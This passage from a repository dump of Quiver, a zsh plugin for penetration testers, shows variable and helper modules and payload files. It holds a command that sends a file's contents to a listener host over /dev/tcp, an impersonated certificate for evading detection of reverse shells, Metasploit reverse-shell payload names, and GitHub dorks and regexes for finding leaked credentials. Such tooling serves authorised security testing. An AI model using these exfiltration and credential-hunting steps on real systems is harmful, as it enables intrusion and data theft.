echo "openssl base64 -in FILE > /dev/tcp/${__LHOST}/${__LPORT}"
print -z "nc -nvlp ${__LPORT} -w 5 > incoming.b64 && openssl base64 -d -in incoming.b64 -out incoming.txt"
}
================================================
FILE: modules/qq-vars-global.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-vars-global
#############################################################
qq-vars-global-help() {
cat << "DOC"
qq-vars-global
--------------
The vars global namespace manages environment variables used in other functions
that are saved between sessions. Values are stored as files the .quiver/globals
directory and can contain sensitive information like API keys. These variables
are used to supply arguments to commands in other modules.
Variables
---------
__IMPACKET: full path to the python3 impacket examples directory
__EXT_PHP: a list of file extensions used on PHP webservers
__EXT_DOCS: a list of common documents file types
__API_GITHUB: your personal Github API key
__API_GOOGLE_DOMAINS: base64 of user:pass for a Google Domains dynamic DNS record (stored in the clear)
__RESOLVERS: path to public resolvers file
__NOTES: path to the directory containing your markdown notes for qq-notes
__MNU_UA: path to the file containing user-agent strings
__MNU_WORDLISTS: path to the file containing a list of favorite wordlists
__TCP_PORTS: path to the file of favorite TCP ports
__SHELL_SSL_CERT: path to the file of an impersonated SSL cert used for reverse shell IDS evasion
__ALIASES: path to the file containing aliases that will be sourced
Commands
--------
qq-vars-global: list all current global variable values
qq-vars-global-set-*: used to set and save each individual variable
DOC
}
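The set-* functions below persist each value with a plain redirect, so the file is created with the shell's default umask (usually 0644) even when it holds API_GITHUB or API_GOOGLE_DOMAINS. The bash below is an added example rather than quiver code: a save/load pair that creates the file owner-only and refuses at load time to read a secret that other local users can read. QQ_GLOBALS stands in for __GLOBALS, and the token value used in the test is constructed.

```bash
#!/usr/bin/env bash
# One file per variable under $QQ_GLOBALS, as quiver does under $__GLOBALS (assumed layout).
QQ_GLOBALS=${QQ_GLOBALS:-"$HOME/.quiver/globals"}

# Write VALUE to $QQ_GLOBALS/NAME with owner-only permissions (directory 0700, file 0600).
# umask 077 in a subshell makes the file 0600 at creation, so there is no window in
# which it is world-readable; the chmod covers a file that already existed as 0644.
save_global() {  # usage: save_global NAME VALUE
  local f="$QQ_GLOBALS/$1"
  mkdir -p "$QQ_GLOBALS" && chmod 700 "$QQ_GLOBALS" || return 1
  ( umask 077 && printf '%s\n' "$2" > "$f" ) && chmod 600 "$f"
}

# Print the stored value. Fails (1) if missing, (2) if group or other can access it,
# so a secret that was copied around with loose permissions is never silently used.
load_global() {  # usage: load_global NAME
  local f="$QQ_GLOBALS/$1" mode
  [ -f "$f" ] || return 1
  mode=$(ls -ld "$f" | cut -c5-10)   # group+other permission bits, "------" when owner-only
  if [ "$mode" != "------" ]; then
    echo "refusing to load $f: permissions are not owner-only ($mode)" >&2
    return 2
  fi
  cat "$f"
}
```

Usage: `save_global API_GITHUB "$token"` from the set function and `__API_GITHUB=$(load_global API_GITHUB)` at load; a refusal on load is the signal to run `chmod 600` on the file and rotate the key if the box is shared.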
qq-vars-global() {
echo "$(__cyan IMPACKET: ) ${__IMPACKET}"
echo "$(__cyan EXT_PHP: ) ${__EXT_PHP}"
echo "$(__cyan EXT_DOCS: ) ${__EXT_DOCS}"
echo "$(__cyan API_GITHUB: ) ${__API_GITHUB}"
echo "$(__cyan NOTES: ) ${__NOTES}"
echo "$(__cyan RESOLVERS: ) ${__RESOLVERS}"
echo "$(__cyan MNU_UA: ) ${__MNU_UA}"
echo "$(__cyan MNU_WORDLISTS: ) ${__MNU_WORDLISTS}"
echo "$(__cyan TCP_PORTS: ) ${__TCP_PORTS}"
echo "$(__cyan SHELL_SSL_CERT: ) ${__SHELL_SSL_CERT}"
echo "$(__cyan ALIASES: ) ${__ALIASES}"
}
########## __IMPACKET
export __IMPACKET=$(cat ${__GLOBALS}/IMPACKET 2> /dev/null || echo "/usr/share/doc/python3-impacket/examples/")
qq-vars-global-set-impacket() {
__ask "Set the full path to the python3-impacket/examples directory."
__askpath __IMPACKET DIR /
echo "${__IMPACKET}" > ${__GLOBALS}/IMPACKET
}
__check-impacket() { [[ -z "${__IMPACKET}" ]] && qq-vars-global-set-impacket }
########## __EXT_PHP
export __EXT_PHP=$(cat ${__GLOBALS}/EXT_PHP 2> /dev/null || echo "php,phtml,pht,xml,inc,log,sql,cgi")
qq-vars-global-set-ext-php() {
__ask "Enter a csv list of PHP server file extensions, ex: php,php3,pht"
__askvar __EXT_PHP EXTENSIONS
echo "${__EXT_PHP}" > ${__GLOBALS}/EXT_PHP
}
__check-ext-php() { [[ -z "${__EXT_PHP}" ]] && qq-vars-global-set-ext-php }
########## __EXT_DOCS
export __EXT_DOCS=$(cat ${__GLOBALS}/EXT_DOCS 2> /dev/null || echo "doc,docx,pdf,xls,xlsx,txt,rtf,odt,ppt,pptx,pps,xml")
qq-vars-global-set-ext-docs() {
__ask "Enter a csv list of document file extensions, ex: doc,xls,ppt"
__askvar __EXT_DOCS EXTENSIONS
echo "${__EXT_DOCS}" > ${__GLOBALS}/EXT_DOCS
}
__check-ext-docs() { [[ -z "${__EXT_DOCS}" ]] && qq-vars-global-set-ext-docs }
########## __API_GITHUB
export __API_GITHUB="$(cat ${__GLOBALS}/API_GITHUB 2> /dev/null)"
qq-vars-global-set-api-github() {
__ask "Enter your github API key below."
__askvar __API_GITHUB API_GITHUB
echo "${__API_GITHUB}" > ${__GLOBALS}/API_GITHUB
}
__check-api-github() { [[ -z "${__API_GITHUB}" ]] && qq-vars-global-set-api-github }
########## __API_GOOGLE_DOMAINS
export __API_GOOGLE_DOMAINS="$(cat ${__GLOBALS}/API_GOOGLE_DOMAINS 2> /dev/null)"
qq-vars-global-set-api-google-domains() {
__ask "Enter Google domains username and password for a dynamic DNS domain"
local u && __askvar u USERNAME
local p && __askvar p PASSWORD
# base64(user:pass) is only the HTTP basic-auth encoding, not protection: the file holds the credential in the clear
__API_GOOGLE_DOMAINS=$(printf '%s' "${u}:${p}" | base64)
echo "${__API_GOOGLE_DOMAINS}" > ${__GLOBALS}/API_GOOGLE_DOMAINS
}
__check-api-google-domains() { [[ -z "${__API_GOOGLE_DOMAINS}" ]] && qq-vars-global-set-api-google-domains }
########## __RESOLVERS
export __RESOLVERS=$(cat ${__GLOBALS}/RESOLVERS 2> /dev/null || echo "${__PAYLOADS}/resolvers.txt")
qq-vars-global-set-resolvers() {
__ask "Set the full path to the file containing a list of resolvers."
__askpath __RESOLVERS FILE $HOME
echo "${__RESOLVERS}" > ${__GLOBALS}/RESOLVERS
}
__check-resolvers() { [[ -z "${__RESOLVERS}" ]] && qq-vars-global-set-resolvers }
########## __NOTES
export __NOTES="$(cat ${__GLOBALS}/NOTES 2> /dev/null)"
qq-vars-global-set-notes() {
__ask "Set the full path to the directory containing markdown notes."
__askpath __NOTES DIR $HOME
echo "${__NOTES}" > ${__GLOBALS}/NOTES
}
__check-notes() { [[ -z "${__NOTES}" ]] && qq-vars-global-set-notes }
########## __MNU_UA
export __MNU_UA="$(cat ${__GLOBALS}/MNU_UA 2> /dev/null || echo "${__PAYLOADS}/user-agents.txt")"
qq-vars-global-set-mnu-ua() {
__ask "Set the full path to the file containing a list of user agent strings"
__askpath __MNU_UA FILE $HOME
echo "${__MNU_UA}" > ${__GLOBALS}/MNU_UA
}
########## __MNU_WORDLISTS
export __MNU_WORDLISTS="$(cat ${__GLOBALS}/MNU_WORDLISTS 2> /dev/null || echo "${__PAYLOADS}/wordlists.txt")"
qq-vars-global-set-mnu-wordlists() {
__ask "Set the full path to the file containing a list of favorite wordlists"
__askpath __MNU_WORDLISTS FILE $HOME
echo "${__MNU_WORDLISTS}" > ${__GLOBALS}/MNU_WORDLISTS
}
########## __TCP_PORTS
export __TCP_PORTS="$(cat ${__GLOBALS}/TCP_PORTS 2> /dev/null || echo "${__PAYLOADS}/tcp-ports.txt")"
qq-vars-global-set-tcp-ports() {
__ask "Set the full path to the file containing a list of favorite TCP ports"
__askpath __TCP_PORTS FILE $HOME
echo "${__TCP_PORTS}" > ${__GLOBALS}/TCP_PORTS
}
########## __SHELL_SSL_CERT
export __SHELL_SSL_CERT="$(cat ${__GLOBALS}/SHELL_SSL_CERT 2> /dev/null || echo "${__PAYLOADS}/aka.ms.pem")"
qq-vars-global-set-shell-ssl-cert() {
__ask "Set the full path to an impersonated SSL certificate in PEM format to use with reverse shells"
__askpath __SHELL_SSL_CERT FILE $HOME
echo "${__SHELL_SSL_CERT}" > ${__GLOBALS}/SHELL_SSL_CERT
}
########## __ALIASES
export __ALIASES="$(cat ${__GLOBALS}/ALIASES 2> /dev/null || echo "${__PAYLOADS}/aliases.rc")"
qq-vars-global-set-aliases() {
__ask "Set the full path to a file containing shell aliases"
__askpath __ALIASES FILE $HOME
echo "${__ALIASES}" > ${__GLOBALS}/ALIASES
}
================================================
FILE: modules/qq-vars.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-vars
#############################################################
qq-vars-help() {
cat << "DOC"
qq-vars
-------
The vars namespace manages environment variables used in other functions. These
variables are set per session, but can be saved with qq-vars-save and reloaded
with qq-vars-load. The values are stored as files in .quiver/vars.
The menu options for some of the variables can be set using qq-vars-global, such
as the list of favorite user-agents or wordlists (qq-vars-global-help).
Variables
---------
__PROJECT: the root directory used for all output, ex: /projects/example
__LOGBOOK: the logbook.md markdown file used in qq-log commands
__IFACE: the interface to use for commands, ex: eth0
__DOMAIN: the domain to use for commands, ex: example.org
__NETWORK: the subnet to use for commands, ex: 10.1.2.0/24
__RHOST: the remote host or target, ex: 10.1.2.3 or target.example.org
__RPORT: the remote port; ex: 80
__LHOST: the accessible local IP address, ex: 10.1.2.3
__LPORT: the accessible local PORT, ex: 4444
__URL: a target URL, example: https://target.example.org
__UA: the user agent to use for commands, ex: googlebot
__WORDLIST: path to a wordlist file, ex: /usr/share/wordlists/example.txt
__PASSLIST: path to a wordlist for password brute forcing, ex: /usr/share/wordlists/rockyou.txt
Commands
--------
qq-vars: alias qv, list all current variable values
qq-vars-save: alias qvs, save all current variable values ($HOME/.quiver)
qq-vars-load: alias qvl, restores all current variable values ($HOME/.quiver)
qq-vars-clear: clears all current variable values
qq-vars-set-*: used to set each individual variable
DOC
}
qq-vars() {
echo "$(__cyan __PROJECT: ) ${__PROJECT}"
echo "$(__cyan __LOGBOOK: ) ${__LOGBOOK}"
echo "$(__cyan __IFACE: ) ${__IFACE}"
echo "$(__cyan __DOMAIN: ) ${__DOMAIN}"
echo "$(__cyan __NETWORK: ) ${__NETWORK}"
echo "$(__cyan __RHOST: ) ${__RHOST}"
echo "$(__cyan __RPORT: ) ${__RPORT}"
echo "$(__cyan __LHOST: ) ${__LHOST}"
echo "$(__cyan __LPORT: ) ${__LPORT}"
echo "$(__cyan __URL: ) ${__URL}"
echo "$(__cyan __UA: ) ${__UA}"
echo "$(__cyan __WORDLIST: ) ${__WORDLIST}"
echo "$(__cyan __PASSLIST: ) ${__PASSLIST}"
}
alias qv="qq-vars"
qq-vars-clear() {
__PROJECT=""
__LOGBOOK=""
__IFACE=""
__DOMAIN=""
__NETWORK=""
__RHOST=""
__RPORT=""
__LHOST=""
__LPORT=""
__URL=""
__UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
__WORDLIST=""
__PASSLIST=""
}
qq-vars-save() {
echo "${__PROJECT}" > $__VARS/PROJECT
echo "${__LOGBOOK}" > $__VARS/LOGBOOK
echo "${__IFACE}" > $__VARS/IFACE
echo "${__DOMAIN}" > $__VARS/DOMAIN
echo "${__NETWORK}" > $__VARS/NETWORK
echo "${__RHOST}" > $__VARS/RHOST
echo "${__RPORT}" > $__VARS/RPORT
echo "${__LHOST}" > $__VARS/LHOST
echo "${__LPORT}" > $__VARS/LPORT
echo "${__URL}" > $__VARS/URL
echo "${__UA}" > $__VARS/UA
echo "${__WORDLIST}" > $__VARS/WORDLIST
echo "${__PASSLIST}" > $__VARS/PASSLIST
qq-vars
}
alias qvs="qq-vars-save"
qq-vars-load() {
__PROJECT=$(cat $__VARS/PROJECT)
__LOGBOOK=$(cat $__VARS/LOGBOOK)
__IFACE=$(cat $__VARS/IFACE)
__DOMAIN=$(cat $__VARS/DOMAIN)
__NETWORK=$(cat $__VARS/NETWORK)
__RHOST=$(cat $__VARS/RHOST)
__RPORT=$(cat $__VARS/RPORT)
__LHOST=$(cat $__VARS/LHOST)
__LPORT=$(cat $__VARS/LPORT)
__URL=$(cat $__VARS/URL)
__UA=$(cat $__VARS/UA)
__WORDLIST=$(cat $__VARS/WORDLIST)
__PASSLIST=$(cat $__VARS/PASSLIST)
qq-vars
}
alias qvl="qq-vars-load"
########## __PROJECT
export __PROJECT=""
qq-vars-set-project() {
__ask "Set the full path to the project root directory where all command output will be directed"
local d && __askpath d "PROJECT DIR" ${__PROJECT}
[[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return
__PROJECT=$d
mkdir -p ${__PROJECT}
}
__check-project() { [[ -z "${__PROJECT}" ]] && qq-vars-set-project }
########## __LOGBOOK
export __LOGBOOK=""
qq-vars-set-logbook() {
__ask "Set the full path to the directory of the logbook file (filename not included)."
local d && __askpath d DIR $HOME
[[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return
mkdir -p $d
__LOGBOOK="${d}/logbook.md"
if [[ -f "${__LOGBOOK}" ]]; then
__warn "${__LOGBOOK} already exists, set as active log"
else
touch ${__LOGBOOK}
echo "# Logbook" >> ${__LOGBOOK}
echo " " >> ${__LOGBOOK}
__ok "${__LOGBOOK} created."
fi
}
__check-logbook() { [[ -z "${__LOGBOOK}" ]] && qq-vars-set-logbook }
########## __IFACE
export __IFACE=""
qq-vars-set-iface() {
if [[ -z "${__IFACE}" ]]
then
__ask "Choose an interface: "
__IFACE=$(__menu $(ip addr list | awk -F': ' '/^[0-9]/ {print $2}'))
else
__prefill __IFACE IFACE ${__IFACE}
fi
}
__check-iface() { [[ -z "${__IFACE}" ]] && qq-vars-set-iface }
########## __DOMAIN
export __DOMAIN=""
qq-vars-set-domain() { __prefill __DOMAIN DOMAIN ${__DOMAIN} }
__check-domain() { [[ -z "${__DOMAIN}" ]] && qq-vars-set-domain }
########## __NETWORK
export __NETWORK=""
qq-vars-set-network() { __prefill __NETWORK NETWORK ${__NETWORK} }
__check-network() { [[ -z "${__NETWORK}" ]] && qq-vars-set-network }
########## __RHOST
export __RHOST=""
qq-vars-set-rhost() { __prefill __RHOST RHOST ${__RHOST} }
########## __RPORT
export __RPORT=""
qq-vars-set-rport() { __prefill __RPORT RPORT ${__RPORT} }
########## __LHOST
export __LHOST=""
qq-vars-set-lhost() {
if [[ -z $__LHOST ]]
then
__ask "Choose a local IP address: "
__LHOST=$(__menu $(ip addr list | grep -e "inet " | cut -d' ' -f6 | cut -d'/' -f1))
else
__prefill __LHOST LHOST ${__LHOST}
fi
}
########## __LPORT
export __LPORT=""
qq-vars-set-lport() { __prefill __LPORT LPORT ${__LPORT} }
########## __URL
export __URL=""
qq-vars-set-url() {
local u && __prefill u URL ${__URL}
__URL=$(echo ${u} | sed 's/\/$//')
}
########## __UA
export __UA="Mozilla/5.0"
qq-vars-set-ua() {
local IFS=$'\n'   # split the menu on lines only, and restore IFS when the function returns
__ask "Choose a user agent: "
__UA=$(__menu $(cat ${__MNU_UA}))
}
__check-ua() { [[ -z "${__UA}" ]] && qq-vars-set-ua }
########## __WORDLIST
export __WORDLIST=""
qq-vars-set-wordlist() {
if [[ -z $__WORDLIST ]]
then
__ask "Choose a wordlist: "
__WORDLIST=$(__menu $(cat ${__MNU_WORDLISTS}))
else
__prefill __WORDLIST WORDLIST ${__WORDLIST}
fi
}
qq-vars-set-wordlist-web() {
__ask "Choose a wordlist: "
__WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/Web-Content | sort))
}
qq-vars-set-wordlist-dns() {
__ask "Choose a wordlist: "
__WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/DNS | sort))
}
########## __PASSLIST
export __PASSLIST="/usr/share/wordlists/rockyou.txt"
qq-vars-set-passlist() {
__ask "Choose a passlist: "
__PASSLIST=$(__menu $(find /usr/share/seclists/Passwords | sort))
}
# helpers
export __THREADS
__check-threads() { __askvar __THREADS THREADS }
export __USER
__check-user() { __askvar __USER USER }
export __SHARE
__check-share() { __askvar __SHARE SHARE }
export __ORG
__check-org() { __askvar __ORG ORG }
export __ASN
__check-asn() { __askvar __ASN ASN }
__netpath() {
__check-project
local net=$(echo ${__NETWORK} | cut -d'/' -f1)
local result=${__PROJECT}/networks/${net}
mkdir -p "${result}"
echo "${result}"
}
__hostpath() {
__check-project
local result=${__PROJECT}/hosts/${__RHOST}
mkdir -p "${result}"
echo "${result}"
}
__urlpath() {
__check-project
local host=$(echo ${__URL} | cut -d'/' -f3)
local result=${__PROJECT}/hosts/${host}
mkdir -p "${result}"
echo "${result}"
}
__dompath() {
__check-project
local result=${__PROJECT}/domains/${__DOMAIN}
mkdir -p "${result}"
echo "${result}"
}
================================================
FILE: modules/qq.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq
#############################################################
qq-help() {
cat << "DOC"
qq
--
The qq namespace is the root of all other namespaces, which can be accessed with tab-completion.
To get started, explore the qq-<namespace>-help commands. Install dependencies per namespace,
using the qq-<namespace>-install commands or install all dependencies using qq-install-all.
Variables
---------
__VERSION Current version of the Quiver plugin
__PLUGIN Full path to the Quiver oh-my-zsh plugin directory
Commands
--------
qq-update: git pull the latest (MASTER branch) version of Quiver
qq-status: check the current status of the locally cloned Quiver repository
qq-whatsnew: display the latest release notes
qq-debug: display the local diagnostic log
Namespaces
----------
Quiver is organized in a tree of namespaces that are accessible via "qq-" with tab completion and search.
Each namespace has its own install and help commands.
Install and Configuration
-------------------------
qq-install- Installers for commonly used applications and global installer for all dependencies
qq-notes- Configure and read your markdown notes
qq-vars-global- Persistent environment variables used in all commands, all sessions
Utility
---------
qq-encoding- Used for encoding / decoding data
qq-kali- Variety of commands for managing Kali linux
Engagement / Project / Bounty
-----------------------------
qq-log- Configure and setup a logbook for current engagement
qq-vars- Per-session, per-engagement variables used in all commands
qq-project- Commands to define scope and manage project data
qq-project-custom- Commands for custom project directory scaffolding
Recon Phase
-----------
qq-recon-org- Recon commands for organization files and data
qq-recon-github- Recon commands for searching github repositories
qq-recon-networks- Recon commands for identifying an organization's networks
qq-recon-domains- Recon commands for horizontal domain enumeration
qq-recon-subs- Recon commands for vertical sub-domain enumeration
Active Enumeration Phase
------------------------
qq-enum-network- Enumerate and scan networks
qq-enum-host- Enumerate and scan an individual host
qq-enum-dhcp- Enumerate DHCP services
qq-enum-dns- Enumerate DNS services
qq-enum-ftp- Enumerate FTP services
qq-enum-kerb- Enumerate Kerberos services
qq-enum-ldap- Enumerate LDAP and Active Directory services
qq-enum-mssql- Enumerate MSSQL database services
qq-enum-mysql- Enumerate MYSQL database services
qq-enum-nfs- Enumerate NFS shares and services
qq-enum-oracle- Enumerate Oracle database services
qq-enum-pop3- Enumerate POP3 services
qq-enum-rdp- Enumerate RDP services
qq-enum-smb- Enumerate SMB services
qq-enum-web- Enumerate web servers and services
qq-enum-web-aws- Enumerate AWS hosted services
qq-enum-web-dirs- Enumerate directories and files
qq-enum-web-elastic- Enumerate Elasticsearch services
qq-enum-web-fuzz- Fuzz inputs such as forms, cookies and headers
qq-enum-web-js- Mine JavaScript files for secrets
qq-enum-web-php- Enumerate PHP web servers
qq-enum-web-ssl- Enumerate SSL certs and services
qq-enum-web-vuln- Check for common web vulnerabilities
qq-enum-web-xss- XSS helpers
Exploitation Phase
------------------
qq-srv- Commands for spawning file hosting services
qq-exploit- Commands for compiling exploits
qq-shell-tty- Commands for upgrading shells to tty
qq-shell-handlers- Commands for spawning reverse shell handlers
qq-shell-handlers-msf- Commands for spawning reverse shells with Metasploit
Post-Exploitation Phase
-----------------------
qq-pivot- Commands for pivoting with SSH
DOC
}
qq-update() {
  cd $HOME/.oh-my-zsh/custom/plugins/quiver
  git pull
  # drop the cached remote-version files so the next load re-checks (-f: they may not exist yet)
  rm -f $__REMOTE_VER
  rm -f $__REMOTE_CHK
  cd - > /dev/null
  source $HOME/.zshrc
}
qq-status() {
cd $HOME/.oh-my-zsh/custom/plugins/quiver
git status | grep On | cut -d" " -f2,3
cd - > /dev/null
}
qq-whatsnew() {
cat $__PLUGIN/RELEASES.md
}
qq-debug() {
cat ${__LOGFILE}
}
##### Output Helpers
__cyan() echo "$fg[cyan]$@ $reset_color"
__green() echo "$fg[green]$@ $reset_color"
__blue() echo "$fg[blue]$@ $reset_color"
__yellow() echo "$fg[yellow]$@ $reset_color"
__red() echo "$fg[red]$@ $reset_color"
__info() __blue "[*] $@"
__ok() __green "[+] $@"
__warn() __yellow "[!] $@"
__err() __red "[X] $@"
##### Input Helpers
__ask() __yellow "$@"
__prompt() __cyan "[?] $@"
__askvar() {
local retval=$1
local question=$2
local tmpval
read "tmpval?$fg[cyan]${question}:$reset_color "
eval $retval="'$tmpval'"
}
__askpath() {
local retval=$1
local question=$2
local prefill=$3
local tmpinput=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -c -o cat)
local tmpval=$(echo "${tmpinput}" | sed 's/\/$//' )
eval $retval="'$tmpval'"
}
__prefill() {
local retval=$1
local question=$2
local prefill=$3
local tmpval=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -o cat)
eval $retval="'$tmpval'"
}
__check-proceed() {
  PS3="$fg[cyan]Select: $reset_color"
  COLUMNS=10
  # returns 0 for "Yes", 1 for anything else (Cancel or an invalid choice)
  select yn in "Yes" "Cancel"; do
    case $yn in
      Yes) return 0;;
      *) return 1;;
    esac
  done
}
__menu() {
PS3="$fg[cyan]Select: $reset_color"
COLUMNS=10
select o in $@; do break; done
echo ${o}
}
##### String Helpers
__trim-slash() { echo $1 | sed 's/\/$//' }
__trim-quotes() { echo $1 | tr -d \" }
__trim-newline() { echo $1 | tr -d "\n" }
__rand() {
if [ "$#" -eq "1" ]
then
head /dev/urandom | tr -dc A-Za-z0-9 | head -c $1 ; echo ''
else
head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16 ; echo ''
fi
}
##### Tool Helpers
__msf() {
local msfcmd=$(cat $@)
print -z "msfconsole -n -q -x \"${msfcmd}\" "
}
================================================
FILE: payloads/aka.ms.pem
================================================
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
================================================
FILE: payloads/aliases.rc
================================================
#nav
alias cd..="cd ../"
alias cls="clear"
alias path="echo -e \${PATH//:/\\n}"
alias cp="cp -iv"
alias mv="mv -iv"
alias lf="ls -l | egrep -v '^d'"
alias ldir='ls -d */'
#sys
alias mounted="sudo mount | column -t"
alias df="df -mTh --total"
alias free="free -th"
alias ps="ps auxf"
alias psg="ps aux | grep -v grep | grep -i -e VSZ -e "
#network
alias pcap="sudo tcpdump -r"
alias myip="curl icanhazip.com"
alias grip="grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'"
#proton vpn
alias pv-check="sudo pip3 install protonvpn-cli --upgrade"
alias pvt="sudo protonvpn c -f"
alias pvu="sudo protonvpn c -f -p udp"
alias pvd="sudo protonvpn disconnect"
alias pvs="sudo protonvpn status"
#zsh
alias zprc="cat ~/.zshrc"
alias zerc="nano ~/.zshrc"
alias zsrc="source ~/.zshrc"
# files and directory
alias linestocsv="paste -s -d, -"
alias csvtolines="tr ',' '\n'"
alias sfu="sort -u "
alias sfip="sort -u | sort -V "
alias sfuc="sort | uniq -c | sort -n"
alias dos2unix="tr -d '\015' "
alias unix2dos="sed -e 's/$/\r/'"
# out
alias trim1="sed 's/.$//'"
alias trim2="sed 's/..$//'"
alias trim3="sed 's/...$//'"
alias trim4="sed 's/....$//'"
# tools
alias hp="httprobe -t 3000 -c 50 "
================================================
FILE: payloads/github-dorks-commits.txt
================================================
"Slack Token": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
"RSA private key": "-----BEGIN RSA PRIVATE KEY-----",
"SSH (OPENSSH) private key": "-----BEGIN OPENSSH PRIVATE KEY-----",
"SSH (DSA) private key": "-----BEGIN DSA PRIVATE KEY-----",
"SSH (EC) private key": "-----BEGIN EC PRIVATE KEY-----",
"PGP private key block": "-----BEGIN PGP PRIVATE KEY BLOCK-----",
"Facebook Oauth": "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]",
"Twitter Oauth": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]",
"GitHub": "[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\"\\s][0-9a-zA-Z]{35,40}['\"\\s]",
"Google Oauth": "(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")",
"AWS API Key": "AKIA[0-9A-Z]{16}",
"Heroku API Key": "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
"Generic Secret": "[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
"Generic API Key": "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
"Slack Webhook": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
"Google (GCP) Service-account": "\"type\": \"service_account\"",
"Twilio API Key": "SK[a-z0-9]{32}",
"Password in URL": "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]",
"Internal subdomain": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),
"Slack Token": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),
"RSA private key": re.compile('-----BEGIN RSA PRIVATE KEY-----'),
"Facebook Oauth": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\'|"][0-9a-f]{32}[\'|"]'),
"Twitter Oauth": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\'|"][0-9a-zA-Z]{35,44}[\'|"]'),
"Google Oauth": re.compile('("client_secret":"[a-zA-Z0-9-_]{24}")'),
"AWS API Key": re.compile('AKIA[0-9A-Z]{16}'),  # [a|A][w|W][s|S].*AKIA[0-9A-Z]{16}
"Heroku API Key": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),
"Generic Secret": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\'|"][0-9a-zA-Z]{32,45}[\'|"]')
================================================
FILE: payloads/msf-windows-payloads.txt
================================================
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter/reverse_named_pipe
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_winhttp
windows/x64/meterpreter/reverse_winhttps
windows/x64/shell/reverse_tcp
windows/x64/shell/reverse_tcp_rc4
windows/x64/shell/reverse_tcp_uuid
windows/x64/shell_bind_tcp
windows/x64/shell_reverse_tcp
================================================
FILE: payloads/recon-dorks-github.txt
================================================
filename:constants
filename:settings
filename:database
filename:config
filename:environment
filename:spec
filename:zshrc
filename:bash
filename:npmrc
filename:dockercfg
filename:pass
filename:global
filename:credentials
filename:connections
filename:s3cfg
filename:wp-config
filename:htpasswd
filename:git-credentials
filename:id_dsa
filename:id_rsa
extension:env
extension:cfg
extension:ini
language:yaml -filename:travis
extension:properties
extension:bat
extension:sh
extension:zsh
extension:pem
extension:ppk
extension:sql
filename:bash_history
filename:bash_profile
filename:bashrc
filename:cshrc
filename:history
filename:netrc
filename:pgpass
filename:tugboat
filename:dhcpd.conf
filename:express.conf
filename:filezilla.xml
filename:idea14.key
filename:makefile
filename:gitconfig
filename:prod.exs
filename:prod.secret.exs
filename:proftpdpasswd
filename:recentservers.xml
filename:robomongo.json
filename:server.cfg
filename:shadow
filename:sshd_config
filename:known_hosts
filename:github_token
staging
stg
prod
preprod
swagger
internal
dotfiles
dot-files
mydotfiles
config
dbpasswd
db_password
db_username
dbuser
testuser
dbpassword
keyPassword
storePassword
passwords
password
secret.password
database_password
sql_password
passwd
pass
pwd
pwds
root_password
credentials
security_credentials
connectionstring
private -language:java
private_key
master_key
token
access_token
auth_token
oauth_token
authorizationToken
secret
secrets
secret_key
secret_token
api_secret
app_secret
appsecret
client_secret
key
send_keys
send.keys
sendkeys
apikey
api_key
app_key
application_key
appkey
appkeysecret
access_key
apiSecret
x-api-key
apidocs
secret_access_key
encryption_key
consumer_key
auth
secure
login
conn.login
sshpass
ssh2_auth_password
irc_pass
fb_secret
sf_username
node_env
aws_key
aws_token
aws_secret
aws_access
AWSSecretKey
github_key
github_token
gh_token
slack_api
slack_token
bucket_password
redis_password
ldap_username
ldap_password
gmail_username
gmail_password
codecov_token
fabricApiSecret
mailgun
mailchimp
appspot
firebase
gitlab
stripe
herokuapp
cloudfront
amazonaws
removed
"removed password"
hardcoded
oops
"fixed security"
"removed prod"
"removed creds"
"removed secret"
filename:passwords.txt
filename:users.txt
================================================
FILE: payloads/recon-dorks-google.txt
================================================
================================================
FILE: payloads/resolvers.txt
================================================
1.1.1.1
1.0.0.1
8.8.8.8
8.8.4.4
208.67.222.222
208.67.220.220
64.6.64.6
64.6.65.6
84.200.69.80
84.200.70.40
205.171.3.66
205.171.202.166
